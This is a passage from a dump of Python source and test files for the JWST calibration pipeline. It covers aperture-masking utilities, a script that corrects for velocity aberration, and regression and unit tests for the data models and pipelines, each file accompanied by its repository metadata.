def _find(self, path):\n if not path:\n return self\n\n cursor = self._instance\n schema = self._schema\n for attr in path:\n try:\n cursor = cursor[attr]\n except KeyError:\n raise KeyError(\"'%s'\" % '.'.join(path))\n schema = properties._get_schema_for_property(schema, attr)\n\n key = '.'.join(path)\n return properties._make_node(key, cursor, schema, self._ctx)\n\n def __delitem__(self, key):\n path = key.split('.')\n parent = self._find(path[:-1])\n try:\n parent.__delattr__(path[-1])\n except KeyError:\n raise KeyError(\"'%s'\" % key)\n\n def __getitem__(self, key):\n path = key.split('.')\n return self._find(path)\n\n def __len__(self):\n def recurse(val):\n n = 0\n for subval in val.values():\n if isinstance(subval, dict):\n n += recurse(subval)\n else:\n n += 1\n return n\n\n return recurse(self._instance)\n\n def __setitem__(self, key, value):\n path = key.split('.')\n parent = self._find(path[:-1])\n try:\n parent.__setattr__(path[-1], value)\n except KeyError:\n raise KeyError(\"'%s'\" % key)\n\nclass Uncertainty(np.ndarray):\n \"\"\"\n Subclass ndarray to include an additional property, uncertainty_type\n \"\"\"\n def __new__(cls, err, uncertainty_type=None):\n # info on how to subclass np.ndarray is at\n # https://docs.scipy.org/doc/numpy/user/basics.subclassing.html\n # this code is taken from there\n obj = np.asarray(err).view(cls)\n obj.uncertainty_type = uncertainty_type\n return obj\n\n def __array_finalize__(self, obj):\n if obj is None:\n return\n self.uncertainty_type = getattr(obj, 'uncertainty_type', None)\n" }, { "alpha_fraction": 0.5593464374542236, "alphanum_fraction": 0.5726030468940735, "avg_line_length": 24.142118453979492, "blob_id": "15101614cca81d4e5a8e975ff5e1520b8060b117", "content_id": "8d2e50902a0c6a461f05be7c836a3c2d019fc2dd", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9731, "license_type": "permissive", "max_line_length": 81, "num_lines": 387, "path": "/jwst/ami/utils.py", "repo_name": "mperrin/jwst", "src_encoding": 
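[Editor's note: illustrative sketch, not part of the recorded repository data.] The ami/utils.py record that follows documents how hole pistons are recovered from fringe phases: build the +1/-1 hole-pair matrix (makeA), pseudo-invert it, and apply it to the fringe-phase vector (fringes2pistons). The algebra in isolation, under the same sign convention (sample phases are random):

    import numpy as np

    def make_nrm_matrix(nh):
        # One row per hole pair: -1 at the first hole of the pair, +1 at the second.
        rows = []
        for h2 in range(nh):
            for h1 in range(h2 + 1, nh):
                row = np.zeros(nh)
                row[h2], row[h1] = -1.0, 1.0
                rows.append(row)
        return np.array(rows)

    A = make_nrm_matrix(7)                     # 21 x 7 for a 7-hole mask
    b = np.random.uniform(-0.1, 0.1, size=21)  # fringe phases
    pistons = -np.dot(np.linalg.pinv(A), b)    # minimum-norm, hence zero-mean, pistons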
"UTF-8", "text": "\nimport logging\n\nfrom jwst.datamodels import dqflags\n\nimport numpy as np\nimport numpy.fft as fft\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\n\ndef quadratic(p, x):\n \"\"\"\n Short Summary\n -------------\n Calculate value of x at minimum or maximum value of y,\n (value of quadratic function at argument)\n\n Parameters\n ----------\n p: numpy array, 3 floats\n quadratic function: p[0]*x*x + p[1]*x + p[2]\n\n x: 1D float array\n arguments of p()\n\n Returns\n -------\n maxx: float\n value of x at minimum or maximum value of y\n\n maxy: float\n max y = -b^2/4a occurs at x = -b^2/2a\n\n fit_val: 1D float array\n values of quadratic function at arguments in x array\n \"\"\"\n maxx = -p[1] / (2.0 * p[0])\n maxy = -p[1] * p[1] / (4.0 * p[0]) + p[2]\n fit_val = p[0] * x * x + p[1] * x + p[2]\n\n return maxx, maxy, fit_val\n\n\ndef makeA(nh):\n \"\"\"\n Long Summary\n -------------\n Writes the 'NRM matrix' that gets pseudo-inverted to provide\n (arbitrarily constrained) zero-mean phases of the holes.\n Algorithm is taken verbatim from Anand's pseudoinverse.py\n\n Ax = b where x are the nh hole phases, b the nh(nh-1)/2 fringe phases,\n and A the NRM matrix\n\n Solve for the hole phases:\n Apinv = np.linalg.pinv(A)\n Solution for unknown x's:\n x = np.dot(Apinv, b)\n\n Following Noah Gamper's convention of fringe phases,\n for holes 'a b c d e f g', rows of A are\n\n (-1 +1 0 0 ...)\n (0 -1 +1 0 ...)\n\n which is implemented in makeA() as:\n matrixA[row,h2] = -1\n matrixA[row,h1] = +1\n\n To change the convention just reverse the signs of the 'ones'.\n\n When tested against Alex'' nrm_model.py 'piston_phase' text output\n of fringe phases, these signs appear to be correct -\n [email protected] 12 Nov 2014\n\n Parameters\n ----------\n nh: integer\n number of holes in NR mask\n\n Returns\n -------\n matrixA: 2D float array\n nh columns, nh(nh-1)/2 rows (eg 21 for nh=7)\n \"\"\"\n log.debug('-------')\n log.debug(' makeA:')\n\n ncols = (nh * (nh - 1)) // 2\n nrows = nh\n matrixA = np.zeros((ncols, nrows))\n\n row = 0\n for h2 in range(nh):\n for h1 in range(h2 + 1, nh):\n if h1 >= nh:\n break\n else:\n log.debug(' row: %s, h1: %s, h2: %s', row, h1, h2)\n\n matrixA[row, h2] = -1\n matrixA[row, h1] = +1\n row += 1\n\n log.debug('matrixA:')\n log.debug(' %s', matrixA)\n\n return matrixA\n\n\ndef fringes2pistons(fringephases, nholes):\n \"\"\"\n Short Summary\n -------------\n For nrm_model.py to use to extract pistons out of fringes, given\n its hole bookkeeping, which apparently matches that of this module,\n and is the same as Noah Gamper's.\n\n Parameters\n ----------\n fringephases: 1D integer array\n fringe phases\n\n nholes: integer\n number of holes\n\n Returns\n -------\n np.dot(Apinv, fringephases): 1D integer array\n pistons in same units as fringe phases\n \"\"\"\n Anrm = makeA(nholes)\n Apinv = np.linalg.pinv(Anrm)\n\n return -np.dot(Apinv, fringephases)\n\n\ndef rebin(a=None, rc=(2, 2)):\n \"\"\"\n Short Summary\n -------------\n Perform simple-minded flux-conserving binning using specified binning\n kernel, clipping trailing size mismatch: eg a 10x3 array binned by\n 3 results in a 3x1 array\n\n Parameters\n ----------\n a: 2D float array\n input array to bin\n\n rc: 2D float array\n binning kernel\n\n Returns\n -------\n binned_arr: float array\n binned array\n \"\"\"\n binned_arr = krebin(a, (a.shape[0] // rc[0], a.shape[1] // rc[1]))\n\n return binned_arr\n\n\ndef krebin(a, shape):\n \"\"\"\n Short Summary\n -------------\n Klaus P's 
fastrebin from web\n\n Parameters\n ----------\n a: 2D float array\n input array to rebin\n\n shape: tuple (integer, integer)\n dimensions of array 'a' binned down by dimensions of binning kernel\n\n Returns\n -------\n reshaped_a: 2D float array\n reshaped input array\n \"\"\"\n sh = shape[0], a.shape[0] // shape[0], shape[1], a.shape[1] // shape[1]\n reshaped_a = a.reshape(sh).sum(-1).sum(1)\n\n return reshaped_a\n\n\ndef rcrosscorrelate(a=None, b=None):\n \"\"\"\n Short Summary\n -------------\n Calculate cross correlation of two identically-shaped real arrays\n\n Parameters\n ----------\n a: 2D float array\n first input array\n\n b: 2D float array\n second input array\n\n Returns\n -------\n c.real.copy():\n real part of array that is the correlation of the two input arrays.\n \"\"\"\n\n c = crosscorrelate(a=a, b=b)/(np.sqrt((a*a).sum())*np.sqrt((b*b).sum()))\n return c.real.copy()\n\n\ndef crosscorrelate(a=None, b=None):\n \"\"\"\n Short Summary\n -------------\n Calculate cross correlation of two identically-shaped real or complex arrays\n\n Parameters\n ----------\n a: 2D complex float array\n first input array\n\n b: 2D complex float array\n second input array\n\n Returns\n -------\n fft.fftshift(c)\n complex array that is the correlation of the two input arrays.\n \"\"\"\n if a.shape != b.shape:\n log.critical('crosscorrelate: need identical arrays')\n return None\n\n fac = np.sqrt(a.shape[0] * a.shape[1])\n\n A = fft.fft2(a) / fac\n B = fft.fft2(b) / fac\n c = fft.ifft2(A * B.conj()) * fac * fac\n\n log.debug('----------------')\n log.debug(' crosscorrelate:')\n log.debug(' a: %s:', a)\n log.debug(' A: %s:', A)\n log.debug(' b: %s:', b)\n log.debug(' B: %s:', B)\n log.debug(' c: %s:', c)\n log.debug(' a.sum(): %s:', a.sum())\n log.debug(' b.sum(): %s:', b.sum())\n log.debug(' c.sum(): %s:', c.sum())\n log.debug(' a.sum()*b.sum(): %s:', a.sum() * b.sum())\n log.debug(' c.sum().real: %s:', c.sum().real)\n log.debug(' a.sum()*b.sum()/c.sum().real: %s:', a.sum()*b.sum()/c.sum().real)\n\n return fft.fftshift(c)\n\n\ndef findmax(mag, vals, mid=1.0):\n \"\"\"\n Short Summary\n -------------\n Fit a quadratic to the given input arrays mag and vals, and calculate the\n value of mag at the extreme value of vals.\n\n Parameters\n ----------\n mag: 1D float array\n array for abscissa\n\n vals: 1D float array\n array for ordinate\n\n mid: float\n midpoint of range\n\n Returns\n -------\n maxx: float\n value of mag at the extreme value of vals\n\n maxy: float\n value of vals corresponding to maxx\n \"\"\"\n p = np.polyfit(mag, vals, 2)\n fitr = np.arange(0.95 * mid, 1.05 * mid, .01)\n maxx, maxy, fitc = quadratic(p, fitr)\n\n return maxx, maxy\n\ndef pix_median_fill_value(input_array, input_dq_array, bsize, xc, yc):\n \"\"\"\n Short Summary\n -------------\n For the pixel specified by (xc, yc), calculate the median value of the\n good values within the box of size bsize neighboring pixels. 
If any of\n the box is outside the data, 0 will be returned.\n\n Parameters\n ----------\n input_array: ndarray\n 2D input array to filter\n input_dq_array: ndarray\n 2D input data quality array\n bsize: scalar\n square box size of the data to extract\n xc: scalar\n x position of the data extraction\n yc: scalar\n y position of the data extraction\n\n Returns\n -------\n median_value: float\n median value of good values within box of neighboring pixels\n\n \"\"\"\n # set the half box size\n hbox = int(bsize/2)\n\n # Extract the region of interest for the data\n try:\n data_array = input_array[xc - hbox:xc + hbox, yc - hbox: yc + hbox]\n dq_array = input_dq_array[xc - hbox:xc + hbox, yc - hbox: yc + hbox]\n except IndexError:\n # If the box is outside the data return 0\n log.warning('Box for median filter is outside the data.')\n return 0.\n\n wh_good = np.where((np.bitwise_and(dq_array, dqflags.pixel['DO_NOT_USE'])\n == 0))\n\n filtered_array = data_array[wh_good]\n\n median_value = np.nanmedian(filtered_array)\n\n if np.isnan(median_value):\n # If the median fails return 0\n log.warning('Median filter returned NaN setting value to 0.')\n median_value = 0.\n\n return median_value\n\n\ndef img_median_replace(img_model, box_size):\n \"\"\"\n Short Summary\n -------------\n Replace bad pixels (either due to a dq value of DO_NOT_USE or having a value\n of NaN) with the median value of surrounding good pixels.\n\n Parameters\n ----------\n img_model: image model containing input array to filter.\n\n box_size: scalar\n box size for the median filter\n\n Returns\n -------\n img_model: input image model whose input array has its bad pixels replaced\n by the median of the surrounding good-value pixels.\n \"\"\"\n input_data = img_model.data\n input_dq = img_model.dq\n\n num_nan = np.count_nonzero(np.isnan(input_data))\n num_dq_bad = np.count_nonzero(input_dq == dqflags.pixel['DO_NOT_USE'])\n\n # check to see if any of the pixels are flagged\n if (num_nan + num_dq_bad > 0):\n bad_locations = np.where(np.isnan(input_data) |\n np.equal(input_dq, dqflags.pixel['DO_NOT_USE']))\n\n # fill the bad pixel values with the median of the data in a box region\n for i_pos in range(len(bad_locations[0])):\n x_box_pos = bad_locations[0][i_pos]\n y_box_pos = bad_locations[1][i_pos]\n\n median_fill = pix_median_fill_value(input_data, input_dq,\n box_size, x_box_pos, y_box_pos)\n\n input_data[x_box_pos, y_box_pos] = median_fill\n\n img_model.data = input_data\n\n return img_model\n" }, { "alpha_fraction": 0.6499210596084595, "alphanum_fraction": 0.6572412848472595, "avg_line_length": 34.91237258911133, "blob_id": "53f36b7bfa0bd9922cc3e9811a58f2178ec2227b", "content_id": "e05fb5520fe00c94ad0e0d20620ef213cc2a1d3e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6967, "license_type": "permissive", "max_line_length": 86, "num_lines": 194, "path": "/scripts/set_velocity_aberration.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# Copyright (C) 2010-2011 Association of Universities for Research in Astronomy (AURA)\n\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n\n# 2. 
Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n\n# 3. The name of AURA and its representatives may not be used to\n# endorse or promote products derived from this software without\n# specific prior written permission.\n\n# THIS SOFTWARE IS PROVIDED BY AURA ``AS IS'' AND ANY EXPRESS OR IMPLIED\n# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL AURA BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS\n# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR\n# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\n# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\n# DAMAGE.\n\n'''\nThis script adds velocity aberration correction information to the FITS\nfiles provided to it on the command line (one or more).\n\nIt assumes the following keywords are present in the file header:\n\nJWST_DX (km/sec)\nJWST_DY (km/sec)\nJWST_DZ (km/sec)\nRA_REF (deg)\nDEC_REF (deg)\n\nThe keywords added are:\n\nVA_SCALE (dimensionless scale factor)\n\nIt does not currently place the new keywords in any particular location\nin the header other than what is required by the standard.\n'''\n\nimport astropy.io.fits as fits\nimport logging\nimport math\nimport sys\n\n# Configure logging\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\nSPEED_OF_LIGHT = 299792.458 # km / s\nd_to_r = math.pi / 180.\n\n\ndef aberration_scale(velocity_x, velocity_y, velocity_z,\n targ_ra, targ_dec):\n \"\"\"Compute the scale factor due to velocity aberration.\n\n Parameters\n ----------\n velocity_x, velocity_y, velocity_z: float\n The components of the velocity of JWST, in km / s with respect to\n the Sun. These are celestial coordinates, with x toward the\n vernal equinox, y toward right ascension 90 degrees and declination\n 0, z toward the north celestial pole.\n\n targ_ra, targ_dec: float\n The right ascension and declination of the target (or some other\n point, such as the center of a detector). The equator and equinox\n should be the same as the coordinate system for the velocity.\n\n Returns\n -------\n scale_factor: float\n Multiply the nominal image scale (e.g. in degrees per pixel) by\n this value to obtain the image scale corrected for the \"aberration\n of starlight\" due to the velocity of JWST with respect to the Sun.\n \"\"\"\n\n speed = math.sqrt(velocity_x**2 + velocity_y**2 + velocity_z**2)\n if speed == 0.0:\n logger.warning('Speed is zero. Forcing scale to 1.0')\n return 1.0\n\n beta = speed / SPEED_OF_LIGHT\n gamma = 1. / math.sqrt(1. 
- beta**2)\n\n # [targ_x, targ_y, targ_z] is a unit vector.\n r_xy = math.cos(targ_dec * d_to_r) # radial distance in xy-plane\n targ_x = r_xy * math.cos(targ_ra * d_to_r)\n targ_y = r_xy * math.sin(targ_ra * d_to_r)\n targ_z = math.sin(targ_dec * d_to_r)\n\n dot_prod = (velocity_x * targ_x +\n velocity_y * targ_y +\n velocity_z * targ_z)\n cos_theta = dot_prod / speed\n # This sin_theta is only valid over the range [0, pi], but so is the\n # angle between the velocity vector and the direction toward the target.\n sin_theta = math.sqrt(1. - cos_theta**2)\n\n tan_theta_p = sin_theta / (gamma * (cos_theta + beta))\n theta_p = math.atan(tan_theta_p)\n\n scale_factor = (gamma * (cos_theta + beta)**2 /\n (math.cos(theta_p)**2 * (1. + beta * cos_theta)))\n\n return scale_factor\n\n\ndef aberration_offset(velocity_x, velocity_y, velocity_z,\n targ_ra, targ_dec):\n \"\"\"Compute the RA/Dec offsets due to velocity aberration.\n\n Parameters\n ----------\n velocity_x, velocity_y, velocity_z: float\n The components of the velocity of JWST, in km / s with respect to\n the Sun. These are celestial coordinates, with x toward the\n vernal equinox, y toward right ascension 90 degrees and declination\n 0, z toward the north celestial pole.\n\n targ_ra, targ_dec: float\n The right ascension and declination of the target (or some other\n point, such as the center of a detector). The equator and equinox\n should be the same as the coordinate system for the velocity.\n\n Returns\n -------\n delta_ra, delta_dec: float\n The offset to be added to the input RA/Dec, in units of radians.\n \"\"\"\n\n xdot = velocity_x / SPEED_OF_LIGHT\n ydot = velocity_y / SPEED_OF_LIGHT\n zdot = velocity_z / SPEED_OF_LIGHT\n\n sin_alpha = math.sin(targ_ra * d_to_r)\n cos_alpha = math.cos(targ_ra * d_to_r)\n sin_delta = math.sin(targ_dec * d_to_r)\n cos_delta = math.cos(targ_dec * d_to_r)\n\n delta_ra = (-xdot * sin_alpha + ydot * cos_alpha) / cos_delta\n delta_dec = (-xdot * cos_alpha * sin_delta -\n ydot * sin_alpha * sin_delta +\n zdot * cos_delta)\n\n return delta_ra, delta_dec\n\n\ndef add_dva(filename):\n '''\n Given the name of a valid partially populated level 1b JWST file,\n determine the velocity aberration scale factor.\n\n It presumes all the accessed keywords are present (see first block).\n '''\n hdulist = fits.open(filename, 'update')\n pheader = hdulist[0].header\n sheader = hdulist['SCI'].header\n jwst_dx = float(pheader['JWST_DX'])\n jwst_dy = float(pheader['JWST_DY'])\n jwst_dz = float(pheader['JWST_DZ'])\n ra_ref = float(sheader['RA_REF'])\n dec_ref = float(sheader['DEC_REF'])\n\n # compute the velocity aberration information\n scale_factor = aberration_scale(jwst_dx, jwst_dy, jwst_dz,\n ra_ref, dec_ref)\n ra_off, dec_off = aberration_offset(jwst_dx, jwst_dy, jwst_dz,\n ra_ref, dec_ref)\n\n # update header\n pheader['DVA_RA'] = ra_off\n pheader['DVA_DEC'] = dec_off\n sheader['VA_SCALE'] = scale_factor\n hdulist.flush()\n hdulist.close()\n\nif __name__ == '__main__':\n if len(sys.argv) <= 1:\n raise ValueError('missing filename argument(s)')\n for filename in sys.argv[1:]:\n add_dva(filename)\n" }, { "alpha_fraction": 0.5910129547119141, "alphanum_fraction": 0.6313785314559937, "avg_line_length": 27.54347801208496, "blob_id": "bc113dde6170e3a08063c9eab76aea2dfbee7e1f", "content_id": "d9f53885f9bbc5dcd71ce5f94711bbc8571f9089", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1313, "license_type": "permissive", "max_line_length": 72, 
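[Editor's note: illustrative sketch, not part of the recorded repository data.] For the velocity aberration script above: with speed v, beta = v/c and gamma = 1/sqrt(1 - beta**2), and the plate-scale factor follows the relativistic aberration formula. A quick sanity check using the functions defined in that record (29.8 km/s is only a sample magnitude, roughly Earth's orbital speed):

    v_x, v_y, v_z = 0.0, 29.8, 0.0  # km/s, celestial frame, along +y (RA 90, Dec 0)
    scale = aberration_scale(v_x, v_y, v_z, 90.0, 0.0)
    dra, ddec = aberration_offset(v_x, v_y, v_z, 90.0, 0.0)
    # Looking straight down the velocity vector, the offsets vanish and
    # scale ~ 1 + beta ~ 1.0001, i.e. about a 0.01% change in plate scale.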
"num_lines": 46, "path": "/jwst/tests_nightly/general/nirspec/test_spec2.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Test aspects of Spec2Pipline\"\"\"\nimport subprocess\n\nimport pytest\nfrom ci_watson.artifactory_helpers import get_bigdata\n\nfrom jwst.assign_wcs.util import NoDataOnDetectorError\nfrom jwst.pipeline import Spec2Pipeline\n\n\[email protected]\ndef test_nrs2_nodata_api(envopt, _jail):\n \"\"\"\n Regression test of handling NRS2 detector that has no data.\\\n \"\"\"\n\n # Only need to ensure that assing_wcs is run.\n # This still will fail and should cause the pipeline to halt.\n step = Spec2Pipeline()\n step.assign_wcs.skip = False\n\n with pytest.raises(NoDataOnDetectorError):\n step.run(get_bigdata('jwst-pipeline', envopt,\n 'nirspec', 'test_assignwcs',\n 'jw84700006001_02101_00001_nrs2_rate.fits'\n ))\n\n\[email protected]\ndef test_nrs2_nodata_strun(envopt, _jail):\n \"\"\"Ensure that the appropriate exit status is returned from strun\"\"\"\n\n data_file = get_bigdata('jwst-pipeline', envopt,\n 'nirspec', 'test_assignwcs',\n 'jw84700006001_02101_00001_nrs2_rate.fits'\n )\n\n cmd = [\n 'strun',\n 'jwst.pipeline.Spec2Pipeline',\n data_file,\n '--steps.assign_wcs.skip=false'\n ]\n status = subprocess.run(cmd)\n\n assert status.returncode == 64\n" }, { "alpha_fraction": 0.6880252361297607, "alphanum_fraction": 0.6901260614395142, "avg_line_length": 22.799999237060547, "blob_id": "132e949ef34436eed83bcaf6352c0cff154adc0e", "content_id": "e9d9882e7932e7bf6a61188bbc9bfb6d82020a0d", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 952, "license_type": "permissive", "max_line_length": 98, "num_lines": 40, "path": "/jwst/datamodels/tests/test_filetype.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom ..filetype import check\n\nSUPPORTED_EXTS = (('fits', 'fits'), ('json', 'asn'), ('asdf', 'asdf')) # (ext, expected filetype)\n\n\[email protected](params=SUPPORTED_EXTS)\ndef input_file(request):\n return f'test_file.{request.param[0]}', request.param[-1]\n\n\[email protected](params=['stpipe.MyPipeline.fits', 'stpipe.MyPipeline.fits.gz'])\ndef pipeline_file(request):\n return request.param\n\n\ndef test_check_on_str_init(input_file):\n filename, expected = input_file\n filetype = check(filename)\n\n assert filetype == expected\n\n\ndef test_check_fails_on_unsupported_ext():\n with pytest.raises(ValueError):\n check('test_file')\n\n\ndef test_check_works_for_zipped(input_file):\n filename, expected = input_file\n filename += '.gz' # extra zip extension\n\n filetype = check(filename)\n\n assert filetype == expected\n\n\ndef test_check_works_for_pipeline_patters(pipeline_file):\n assert check(pipeline_file) == 'fits'\n" }, { "alpha_fraction": 0.5657083988189697, "alphanum_fraction": 0.5770020484924316, "avg_line_length": 29.4375, "blob_id": "7a766ec00bc4b9882bd8cc77639094a622df57cd", "content_id": "c226e4c4b05c5629392271938650e41f0430207c", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2922, "license_type": "permissive", "max_line_length": 73, "num_lines": 96, "path": "/jwst/datamodels/tests/test_history.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import datetime\n\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.time import Time\n\nfrom asdf.tags.core import HistoryEntry\n\nfrom .. 
import DataModel\n\n\ndef test_historylist_methods():\n m = DataModel()\n h1 = m.history\n\n info = \"First entry\"\n h1.append(info)\n assert h1 == info, \"Append new history entry\"\n\n h2 = m.history\n assert h2 == info, \"Two history lists point to the same object\"\n\n assert len(h1) == 1, \"Length of a history list\"\n\n entry = h1[0]\n assert entry[\"description\"] == info, \"Get history list item\"\n\n info += \" for real\"\n h1[0] = info\n assert h1 == info, \"Set history list item\"\n\n del h1[0]\n assert len(h1) == 0, \"Delete history list item\"\n\n info = (\"First entry\", \"Second_entry\", \"Third entry\")\n h1.extend(info)\n assert len(h1) == 3, \"Length of extended history list\"\n assert h1 == info, \"Contents of extended history list\"\n\n for entry, item in zip(h1, info):\n assert entry[\"description\"] == item, \"Iterate over history list\"\n\n h1.clear()\n assert len(h1) == 0, \"Clear history list\"\n\ndef test_history_from_model_to_fits(tmpdir):\n tmpfits = str(tmpdir.join('tmp.fits'))\n m = DataModel()\n m.history = [HistoryEntry({\n 'description': 'First entry',\n 'time': Time(datetime.datetime.now())})]\n m.history.append(HistoryEntry({\n 'description': 'Second entry',\n 'time': Time(datetime.datetime.now())\n }))\n m.save(tmpfits)\n\n with fits.open(tmpfits, memmap=False) as hdulist:\n assert list(hdulist[0].header['HISTORY']) == [\"First entry\",\n \"Second entry\"]\n\n with DataModel(tmpfits) as m2:\n m2 = DataModel()\n m2.update(m)\n m2.history = m.history\n\n assert m2.history == [{'description': \"First entry\"},\n {'description': \"Second entry\"}]\n\n m2.save(tmpfits)\n\n with fits.open(tmpfits, memmap=False) as hdulist:\n assert list(hdulist[0].header['HISTORY']) == [\"First entry\",\n \"Second entry\"]\n\n\ndef test_history_from_fits(tmpdir):\n tmpfits = str(tmpdir.join('tmp.fits'))\n header = fits.Header()\n header['HISTORY'] = \"First entry\"\n header['HISTORY'] = \"Second entry\"\n fits.writeto(tmpfits, np.array([]), header, overwrite=True)\n\n with DataModel(tmpfits) as m:\n assert m.history == [{'description': 'First entry'},\n {'description': 'Second entry'}]\n\n del m.history[0]\n m.history.append(HistoryEntry({'description': \"Third entry\"}))\n assert m.history == [{'description': \"Second entry\"},\n {'description': \"Third entry\"}]\n m.save(tmpfits)\n\n with DataModel(tmpfits) as m:\n assert m.history == [{'description': \"Second entry\"},\n {'description': \"Third entry\"}]\n" }, { "alpha_fraction": 0.5180887579917908, "alphanum_fraction": 0.5805460810661316, "avg_line_length": 33.47058868408203, "blob_id": "624eb7e9059f3e6f7b43c5bc15387ae3b625b331", "content_id": "2d8dc8ee96fd975ede9fbb53e85387cdd74f6994", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2930, "license_type": "permissive", "max_line_length": 84, "num_lines": 85, "path": "/jwst/tests_nightly/general/nircam/test_nrc_image3_1.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe import Step\n\n\[email protected]\nclass TestImage3Pipeline1(BaseJWSTTest):\n \"\"\"Regression test definitions for CALIMAGE3 pipeline.\n\n Regression test of calwebb_image3 pipeline on NIRCam\n simulated long-wave data.\n \"\"\"\n input_loc = 'nircam'\n ref_loc = ['test_calimage3', 'truth']\n test_dir = 'test_calimage3'\n\n def 
test_image3_pipeline1(self):\n\n asn_name = \"mosaic_long_asn.json\"\n asn_file = self.get_data('test_calimage3', asn_name)\n for file in raw_from_asn(asn_file):\n self.get_data('test_calimage3', file)\n\n collect_pipeline_cfgs('config')\n\n args = [\n 'config/calwebb_image3.cfg',\n asn_file,\n '--steps.tweakreg.skip=True',\n ]\n\n Step.from_cmdline(args)\n\n self.ignore_keywords += ['NAXIS1', 'TFORM*']\n self.ignore_fields = self.ignore_keywords\n self.rtol = 0.0001\n\n outputs = [('nrca5_47Tuc_subpix_dither1_newpos_a3001_crf.fits',\n 'nrca5_47Tuc_subpix_dither1_newpos_cal-a3001_ref.fits'),\n ('mosaic_long_i2d.fits',\n 'mosaic_long_i2d_ref.fits'),\n ('mosaic_long_cat.ecsv',\n 'mosaic_long_cat_ref.ecsv'),\n ]\n self.compare_outputs(outputs)\n\n def test_image3_pipeline2(self):\n \"\"\"Regression test definitions for CALIMAGE3 pipeline.\n\n Regression test of calwebb_image3 pipeline on NIRCam\n simulated long-wave data with a 6-point dither.\n \"\"\"\n asn_file = self.get_data(self.test_dir,\n \"jw10002-o001_20171116t191235_image3_002_asn.json\")\n for file in raw_from_asn(asn_file):\n self.get_data(self.test_dir, file)\n\n collect_pipeline_cfgs('config')\n\n args = [\n 'config/calwebb_image3.cfg',\n asn_file,\n '--steps.tweakreg.kernel_fwhm=2',\n '--steps.tweakreg.snr_threshold=5',\n '--steps.tweakreg.enforce_user_order=True',\n '--steps.tweakreg.searchrad=10',\n '--steps.tweakreg.fitgeometry=rscale',\n ]\n\n Step.from_cmdline(args)\n\n self.ignore_keywords += ['NAXIS1', 'TFORM*']\n self.ignore_fields = self.ignore_keywords\n self.rtol = 0.0001\n\n outputs = [('jw10002001001_01101_00004_nrcblong_o001_crf.fits',\n 'jw10002001001_01101_00004_nrcblong_o001_crf_ref.fits'),\n ('jw10002-o001_t002_nircam_f444w_i2d.fits',\n 'jw10002-o001_t002_nircam_f444w_i2d_ref.fits'),\n ('jw10002-o001_t002_nircam_f444w_cat.ecsv',\n 'jw10002-o001_t002_nircam_f444w_cat_ref.ecsv'),\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 28.600000381469727, "blob_id": "ed9d50a2226f4e5509dd054ec422320f212203f4", "content_id": "48f9af6f75b99aa0fd3c3047c3d4a3f08341c810", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 148, "license_type": "permissive", "max_line_length": 48, "num_lines": 5, "path": "/jwst/stpipe/__init__.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "from .step import Step\nfrom .pipeline import Pipeline\nfrom .linear_pipeline import LinearPipeline\n\n__all__ = ['Step', 'Pipeline', 'LinearPipeline']\n" }, { "alpha_fraction": 0.6857815980911255, "alphanum_fraction": 0.7140612602233887, "avg_line_length": 44.46428680419922, "blob_id": "383b267ce2db4522f8e8f40581faec43357f5087", "content_id": "d30b0870ffd5070bd9558b200f8631daa8684ee7", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1273, "license_type": "permissive", "max_line_length": 85, "num_lines": 28, "path": "/jwst/assign_wcs/tests/test_schemas.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "from astropy.modeling import models\nfrom astropy import units as u\nfrom jwst.datamodels import DistortionModel\n\n\ndef test_distortion_schema(tmpdir):\n \"\"\"Make sure DistortionModel roundtrips\"\"\"\n m = models.Shift(1) & models.Shift(2)\n dist = DistortionModel(model=m, input_units=u.pixel, output_units=u.arcsec)\n\n 